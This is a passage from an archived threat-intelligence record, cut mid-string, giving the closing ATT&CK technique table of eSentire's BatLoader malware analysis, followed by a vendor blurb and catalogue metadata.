Access\r\nID\r\nT1189\r\nMITRE ATT\u0026CK Technique\r\nDrive-by Compromise\r\nDescription\r\nBatLoader is delivered via fake software installers\r\nMITRE ATT\u0026CK\r\nTactic\r\nUser Execution\r\nID\r\nT1204.002\r\nMITRE ATT\u0026CK Technique\r\nMalicious File\r\nDescription\r\nThe user launches the malicious MSI file\r\nMITRE ATT\u0026CK\r\nTactic\r\nPersistence\r\nID\r\nT1547.001\r\nMITRE ATT\u0026CK Technique\r\nBoot or Logon Autostart\r\nExecution: Registry Run\r\nKeys / Startup Folder\r\nDescription\r\nAs a result of BatLoader infection, ISFB malware\r\ncreates the persistence via Registry Run Keys.\r\nSyncro RMM can also be used as a persistence\r\nmechanism\r\nMITRE ATT\u0026CK\r\nTactic\r\nDefense\r\nEvasion\r\nID\r\nT1562.001\r\nMITRE ATT\u0026CK Technique\r\nImpair Defenses: Disable or\r\nModify Tools\r\nDescription\r\nDisabling Windows Defender notifications, Task\r\nManager and Command Prompt\r\nMITRE ATT\u0026CK\r\nTactic\r\nProcess\r\nInjection\r\nID\r\nT1055\r\nDescription\r\nISFB injects itself into explorer.exe as a result of\r\nsuccessful BatLoader infection\r\nMITRE ATT\u0026CK\r\nTactic\r\nUnsecured\r\nCredentials\r\nID\r\nT1552.001\r\nMITRE ATT\u0026CK Technique\r\nUnsecured Credentials:\r\nCredentials In Files\r\nDescription\r\nThe ISFB version observed is capable of accessing\r\nbrowser credentials and cookies, Thunderbird and\r\nOutlook profiles, POP3, SMTP passwords.\r\nhttps://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-batloader\r\nPage 23 of 24\n\nTo learn how your organization can build cyber resilience and prevent business disruption with eSentire’s Next Level\r\nMDR, connect with an eSentire Security Specialist now.\r\nGET STARTED\r\nABOUT ESENTIRE’S THREAT RESPONSE UNIT (TRU)\r\nThe eSentire Threat Response Unit (TRU) is an industry-leading threat research team committed to helping your\r\norganization become more resilient. TRU is an elite team of threat hunters and researchers that supports our 24/7 Security\r\nOperations Centers (SOCs), builds threat detection models across the eSentire XDR Cloud Platform, and works as an\r\nextension of your security team to continuously improve our Managed Detection and Response service. By providing\r\ncomplete visibility across your attack surface and performing global threat sweeps and proactive hypothesis-driven threat\r\nhunts augmented by original threat research, we are laser-focused on defending your organization against known and\r\nunknown threats.\r\nSource: https://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-batloader\r\nhttps://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-batloader\r\nPage 24 of 24",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-batloader"
	],
	"report_names": [
		"esentire-threat-intelligence-malware-analysis-batloader"
	],
	"threat_actors": [
		{
			"id": "610a7295-3139-4f34-8cec-b3da40add480",
			"created_at": "2023-01-06T13:46:38.608142Z",
			"updated_at": "2026-04-10T02:00:03.03764Z",
			"deleted_at": null,
			"main_name": "Cobalt",
			"aliases": [
				"Cobalt Group",
				"Cobalt Gang",
				"GOLD KINGSWOOD",
				"COBALT SPIDER",
				"G0080",
				"Mule Libra"
			],
			"source_name": "MISPGALAXY:Cobalt",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434704,
	"ts_updated_at": 1775826709,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/fae8f21f020f637b2c3bbc993334632d9a4f9936.pdf",
		"text": "https://archive.orkl.eu/fae8f21f020f637b2c3bbc993334632d9a4f9936.txt",
		"img": "https://archive.orkl.eu/fae8f21f020f637b2c3bbc993334632d9a4f9936.jpg"
	}
}